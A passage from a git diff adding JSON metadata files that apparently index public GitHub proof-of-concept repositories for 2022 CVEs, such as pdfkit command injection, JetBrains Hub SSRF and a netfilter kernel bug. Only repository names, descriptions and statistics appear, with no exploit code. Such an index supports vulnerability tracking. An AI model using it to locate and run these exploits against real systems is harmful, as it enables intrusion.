"created_at": "2022-03-02T13:14:11Z", + "updated_at": "2024-08-12T20:21:09Z", + "pushed_at": "2022-05-10T14:32:31Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "elevation", + "exploit", + "printix" + ], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25235.json b/2022/CVE-2022-25235.json new file mode 100644 index 0000000000..3f7d83bf65 --- /dev/null +++ b/2022/CVE-2022-25235.json @@ -0,0 +1,33 @@ +[ + { + "id": 495706238, + "name": "external_expat_AOSP10_r33_CVE-2022-25235", + "full_name": "Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-25235", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-25235", + "description": null, + "fork": false, + "created_at": "2022-05-24T07:00:24Z", + "updated_at": "2023-09-15T18:43:57Z", + "pushed_at": "2022-05-24T07:30:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25236.json b/2022/CVE-2022-25236.json new file mode 100644 index 0000000000..403e56d0bb --- /dev/null +++ b/2022/CVE-2022-25236.json @@ -0,0 +1,33 @@ +[ + { + "id": 489225532, + "name": "external_expat_AOSP10_r33_CVE-2022-25236", + "full_name": "Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-25236", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-25236", + "description": null, + "fork": false, + "created_at": "2022-05-06T05:19:11Z", + "updated_at": "2022-05-06T05:22:20Z", + "pushed_at": "2022-05-06T05:22:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25256.json b/2022/CVE-2022-25256.json new file mode 100644 index 0000000000..9de35a28a0 --- /dev/null +++ b/2022/CVE-2022-25256.json @@ -0,0 +1,33 @@ +[ + { + "id": 467043253, + "name": "CVE-2022-25256", + "full_name": "RobertDra\/CVE-2022-25256", + "owner": { + "login": "RobertDra", + "id": 68341018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68341018?v=4", + "html_url": "https:\/\/github.com\/RobertDra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RobertDra\/CVE-2022-25256", + "description": null, + "fork": false, + "created_at": "2022-03-07T10:18:41Z", + "updated_at": "2022-03-07T10:18:41Z", + "pushed_at": "2022-06-19T07:17:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25257.json b/2022/CVE-2022-25257.json new file mode 100644 index 0000000000..7b76abf0b9 --- /dev/null +++ b/2022/CVE-2022-25257.json @@ -0,0 +1,64 @@ +[ + { + "id": 461406728, + "name": "CVE-2022-25257", + "full_name": "polling-repo-continua\/CVE-2022-25257", + "owner": { + "login": "polling-repo-continua", + "id": 68729769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68729769?v=4", + "html_url": "https:\/\/github.com\/polling-repo-continua", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polling-repo-continua\/CVE-2022-25257", + "description": null, + "fork": false, + "created_at": "2022-02-20T06:42:24Z", + "updated_at": "2022-02-23T15:48:49Z", + "pushed_at": "2022-02-17T13:54:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467043457, + "name": "CVE-2022-25257", + "full_name": "RobertDra\/CVE-2022-25257", + "owner": { + "login": "RobertDra", + "id": 68341018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68341018?v=4", + "html_url": "https:\/\/github.com\/RobertDra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RobertDra\/CVE-2022-25257", + "description": null, + "fork": false, + "created_at": "2022-03-07T10:19:20Z", + "updated_at": "2022-03-07T10:19:20Z", + "pushed_at": "2022-03-07T10:19:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25258.json b/2022/CVE-2022-25258.json new file mode 100644 index 0000000000..108295b5c2 --- /dev/null +++ b/2022/CVE-2022-25258.json @@ -0,0 +1,33 @@ +[ + { + "id": 459503187, + "name": "d-os-descriptor", + "full_name": "szymonh\/d-os-descriptor", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/d-os-descriptor", + "description": "CVE-2022-25258 - Demo exploit targeting usb gadget's os descriptor handler", + "fork": false, + "created_at": "2022-02-15T09:04:25Z", + "updated_at": "2022-02-17T08:51:30Z", + "pushed_at": "2022-02-16T20:40:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25260.json b/2022/CVE-2022-25260.json new file mode 100644 index 0000000000..3795c1a8b4 --- /dev/null +++ b/2022/CVE-2022-25260.json @@ -0,0 +1,41 @@ +[ + { + "id": 531686651, + "name": "CVE-2022-25260", + "full_name": "yuriisanin\/CVE-2022-25260", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-25260", + "description": "PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub", + "fork": false, + "created_at": "2022-09-01T21:08:19Z", + "updated_at": "2024-08-12T20:26:41Z", + "pushed_at": "2022-09-01T21:14:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-25260", + "exploit", + "jetbrains", + "jetbrains-hub", + "ssrf", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25262.json b/2022/CVE-2022-25262.json new file mode 100644 index 0000000000..b18a52e6dc --- /dev/null +++ b/2022/CVE-2022-25262.json @@ -0,0 +1,40 @@ +[ + { + "id": 488370340, + "name": "CVE-2022-25262", + "full_name": "yuriisanin\/CVE-2022-25262", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-25262", + "description": "PoC + vulnerability details for CVE-2022-25262 \/ JetBrains Hub single-click SAML response takeover", + "fork": false, + "created_at": "2022-05-03T21:38:58Z", + "updated_at": "2024-08-12T20:22:57Z", + "pushed_at": "2022-07-05T17:32:01Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-25262", + "exploit", + "jetbrains", + "jetbrains-hub", + "vulnerability" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25265.json b/2022/CVE-2022-25265.json new file mode 100644 index 0000000000..0acb22ad73 --- /dev/null +++ b/2022/CVE-2022-25265.json @@ -0,0 +1,39 @@ +[ + { + "id": 459999417, + "name": "exec-prot-bypass", + "full_name": "x0reaxeax\/exec-prot-bypass", + "owner": { + "login": "x0reaxeax", + "id": 61374847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61374847?v=4", + "html_url": "https:\/\/github.com\/x0reaxeax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x0reaxeax\/exec-prot-bypass", + "description": "Bypassing Linux Executable Space Protection using 20+ years old tools (CVE-2022-25265).", + "fork": false, + "created_at": "2022-02-16T12:42:24Z", + "updated_at": "2024-05-15T06:21:01Z", + "pushed_at": "2022-02-19T18:06:01Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-25265", + "dep-bypass", + "exploit", + "linux", + "noexec" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25313.json b/2022/CVE-2022-25313.json new file mode 100644 index 0000000000..6c83f1c2f3 --- /dev/null +++ b/2022/CVE-2022-25313.json @@ -0,0 +1,64 @@ +[ + { + "id": 491006401, + "name": "external_expact_AOSP10_r33_CVE-2022-25313", + "full_name": "ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25313", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25313", + "description": null, + "fork": false, + "created_at": "2022-05-11T07:40:30Z", + "updated_at": "2022-05-11T08:01:30Z", + "pushed_at": "2022-05-11T08:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 626759487, + "name": "external_expat-2.1.0_CVE-2022-25313", + "full_name": "Trinadh465\/external_expat-2.1.0_CVE-2022-25313", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_expat-2.1.0_CVE-2022-25313", + "description": null, + "fork": false, + "created_at": "2023-04-12T05:30:46Z", + "updated_at": "2023-04-12T05:44:54Z", + "pushed_at": "2023-04-12T05:45:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25314.json b/2022/CVE-2022-25314.json new file mode 100644 index 0000000000..b5530d5d2f --- /dev/null +++ b/2022/CVE-2022-25314.json @@ -0,0 +1,33 @@ +[ + { + "id": 491037235, + "name": "external_expact_AOSP10_r33_CVE-2022-25314", + "full_name": "ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25314", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25314", + "description": null, + "fork": false, + "created_at": "2022-05-11T09:11:39Z", + "updated_at": "2022-05-11T09:22:08Z", + "pushed_at": "2022-05-11T09:23:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25315.json b/2022/CVE-2022-25315.json new file mode 100644 index 0000000000..047016921e --- /dev/null +++ b/2022/CVE-2022-25315.json @@ -0,0 +1,64 @@ +[ + { + "id": 491043801, + "name": "external_expact_AOSP10_r33_CVE-2022-25315", + "full_name": "ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25315", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_expact_AOSP10_r33_CVE-2022-25315", + "description": null, + "fork": false, + "created_at": "2022-05-11T09:31:06Z", + "updated_at": "2022-05-11T09:48:07Z", + "pushed_at": "2022-05-11T09:48:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624274624, + "name": "external_expat_v2.1.0_CVE-2022-25315", + "full_name": "hshivhare67\/external_expat_v2.1.0_CVE-2022-25315", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/external_expat_v2.1.0_CVE-2022-25315", + "description": null, + "fork": false, + "created_at": "2023-04-06T05:42:39Z", + "updated_at": "2023-04-06T05:49:21Z", + "pushed_at": "2023-04-06T05:49:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25365.json b/2022/CVE-2022-25365.json new file mode 100644 index 0000000000..31536dc401 --- /dev/null +++ b/2022/CVE-2022-25365.json @@ -0,0 +1,33 @@ +[ + { + "id": 603748967, + "name": "CVE-2022-25365", + "full_name": "followboy1999\/CVE-2022-25365", + "owner": { + "login": "followboy1999", + "id": 4121091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4121091?v=4", + "html_url": "https:\/\/github.com\/followboy1999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/followboy1999\/CVE-2022-25365", + "description": null, + "fork": false, + "created_at": "2023-02-19T13:19:10Z", + "updated_at": "2024-05-27T08:43:16Z", + "pushed_at": "2023-02-19T13:32:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25375.json b/2022/CVE-2022-25375.json new file mode 100644 index 0000000000..c29fb8f546 --- /dev/null +++ b/2022/CVE-2022-25375.json @@ -0,0 +1,33 @@ +[ + { + "id": 460460049, + "name": "rndis-co", + "full_name": "szymonh\/rndis-co", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/rndis-co", + "description": "CVE-2022-25375 - Demo exploit of RNDIS USB Gadget", + "fork": false, + "created_at": "2022-02-17T14:02:58Z", + "updated_at": "2024-09-15T12:30:43Z", + "pushed_at": "2022-02-20T19:56:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2546.json b/2022/CVE-2022-2546.json new file mode 100644 index 0000000000..b556bdbf13 --- /dev/null +++ b/2022/CVE-2022-2546.json @@ -0,0 +1,33 @@ +[ + { + "id": 859921517, + "name": "CVE-2022-2546", + "full_name": "OpenXP-Research\/CVE-2022-2546", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-2546", + "description": "All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF", + "fork": false, + "created_at": "2024-09-19T14:05:55Z", + "updated_at": "2024-09-19T14:06:07Z", + "pushed_at": "2024-09-19T14:06:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25479.json b/2022/CVE-2022-25479.json new file mode 100644 index 0000000000..561cc6009e --- /dev/null +++ b/2022/CVE-2022-25479.json @@ -0,0 +1,33 @@ +[ + { + "id": 858573400, + "name": "CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "full_name": "SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "description": "CVE-2024-40431+CVE-2022-25479 chain for EOP(DATA ONLY ATTACK) ", + "fork": false, + "created_at": "2024-09-17T06:28:17Z", + "updated_at": "2024-11-18T12:42:17Z", + "pushed_at": "2024-10-16T22:27:13Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25636.json b/2022/CVE-2022-25636.json new file mode 100644 index 0000000000..b8ed771edb --- /dev/null +++ b/2022/CVE-2022-25636.json @@ -0,0 +1,95 @@ +[ + { + "id": 467109253, + "name": "CVE-2022-25636", + "full_name": "Bonfee\/CVE-2022-25636", + "owner": { + "login": "Bonfee", + "id": 53857102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53857102?v=4", + "html_url": "https:\/\/github.com\/Bonfee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bonfee\/CVE-2022-25636", + "description": "CVE-2022-25636", + "fork": false, + "created_at": "2022-03-07T13:38:41Z", + "updated_at": "2024-09-27T13:47:21Z", + "pushed_at": "2022-03-07T17:18:19Z", + "stargazers_count": 426, + "watchers_count": 426, + "has_discussions": false, + "forks_count": 83, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 83, + "watchers": 426, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 473492971, + "name": "CVE-2022-25636", + "full_name": "chenaotian\/CVE-2022-25636", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-25636", + "description": "CVE-2022-0185 analysis write up", + "fork": false, + "created_at": "2022-03-24T07:04:55Z", + "updated_at": "2022-08-05T06:48:34Z", + "pushed_at": "2022-03-24T07:10:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478013602, + "name": "CVE-2022-25636-PipeVersion", + "full_name": "veritas501\/CVE-2022-25636-PipeVersion", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-25636-PipeVersion", + "description": "CVE-2022-25636 exploit rewritten with pipe primitive", + "fork": false, + "created_at": "2022-04-05T07:08:09Z", + "updated_at": "2023-05-25T03:10:49Z", + "pushed_at": "2022-04-05T08:56:33Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25640.json b/2022/CVE-2022-25640.json new file mode 100644 index 0000000000..21bd20b94c --- /dev/null +++ b/2022/CVE-2022-25640.json @@ -0,0 +1,33 @@ +[ + { + "id": 470630889, + "name": "cve-2022-25640-exploit", + "full_name": "dim0x69\/cve-2022-25640-exploit", + "owner": { + "login": "dim0x69", + "id": 1571696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1571696?v=4", + "html_url": "https:\/\/github.com\/dim0x69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dim0x69\/cve-2022-25640-exploit", + "description": "Exploitation of CVE-2020-256480 using scapy", + "fork": false, + "created_at": "2022-03-16T14:59:08Z", + "updated_at": "2022-03-29T00:14:52Z", + "pushed_at": "2022-03-16T15:05:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25765.json b/2022/CVE-2022-25765.json new file mode 100644 index 0000000000..6cf987597f --- /dev/null +++ b/2022/CVE-2022-25765.json @@ -0,0 +1,284 @@ +[ + { + "id": 574239439, + "name": "CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "full_name": "PurpleWaveIO\/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "owner": { + "login": "PurpleWaveIO", + "id": 104524404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104524404?v=4", + "html_url": "https:\/\/github.com\/PurpleWaveIO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PurpleWaveIO\/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "description": "pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765", + "fork": false, + "created_at": "2022-12-04T21:00:05Z", + "updated_at": "2024-04-09T12:36:11Z", + "pushed_at": "2022-12-06T19:00:15Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575460378, + "name": "PDFKitExploit", + "full_name": "Wai-Yan-Kyaw\/PDFKitExploit", + "owner": { + "login": "Wai-Yan-Kyaw", + "id": 65071822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65071822?v=4", + "html_url": "https:\/\/github.com\/Wai-Yan-Kyaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wai-Yan-Kyaw\/PDFKitExploit", + "description": "A Shell exploit for CVE-2022-25765", + "fork": false, + "created_at": "2022-12-07T15:04:59Z", + "updated_at": "2022-11-30T21:24:23Z", + "pushed_at": "2022-11-29T09:25:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 576947018, + "name": "CVE-2022-25765", + "full_name": "LordRNA\/CVE-2022-25765", + "owner": { + "login": "LordRNA", + "id": 1210799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1210799?v=4", + "html_url": "https:\/\/github.com\/LordRNA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LordRNA\/CVE-2022-25765", + "description": "PoC for Blind RCE for CVE-2022-25765 (Tested in HTB - Precious Machine)", + "fork": false, + "created_at": "2022-12-11T14:02:49Z", + "updated_at": "2023-10-24T03:11:13Z", + "pushed_at": "2022-12-11T14:25:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580436493, + "name": "PDFkit-CMD-Injection", + "full_name": "shamo0\/PDFkit-CMD-Injection", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/PDFkit-CMD-Injection", + "description": "CVE-2022-25765 pdfkit <0.8.6 command injection.", + "fork": false, + "created_at": "2022-12-20T14:59:41Z", + "updated_at": "2024-07-02T10:01:35Z", + "pushed_at": "2022-12-21T14:19:03Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "25765", + "cmd", + "command", + "cve", + "exploit", + "injection", + "pdfkit", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594688502, + "name": "PDFkit-CMD-Injection-CVE-2022-25765", + "full_name": "nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765", + "owner": { + "login": "nikn0laty", + "id": 96344826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4", + "html_url": "https:\/\/github.com\/nikn0laty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765", + "description": "Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6", + "fork": false, + "created_at": "2023-01-29T10:36:40Z", + "updated_at": "2024-11-18T15:37:59Z", + "pushed_at": "2023-01-29T11:01:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 599828263, + "name": "exploit-CVE-2022-25765", + "full_name": "UNICORDev\/exploit-CVE-2022-25765", + "owner": { + "login": "UNICORDev", + "id": 103281826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4", + "html_url": "https:\/\/github.com\/UNICORDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2022-25765", + "description": "Exploit for CVE-2022–25765 (pdfkit) - Command Injection", + "fork": false, + "created_at": "2023-02-10T00:50:35Z", + "updated_at": "2024-11-23T22:33:04Z", + "pushed_at": "2024-05-20T00:34:48Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "cve-2022-25765", + "exploit", + "hackthebox", + "htb", + "linux", + "pdfkit", + "penetration-testing", + "proof-of-concept", + "python", + "unicord", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { 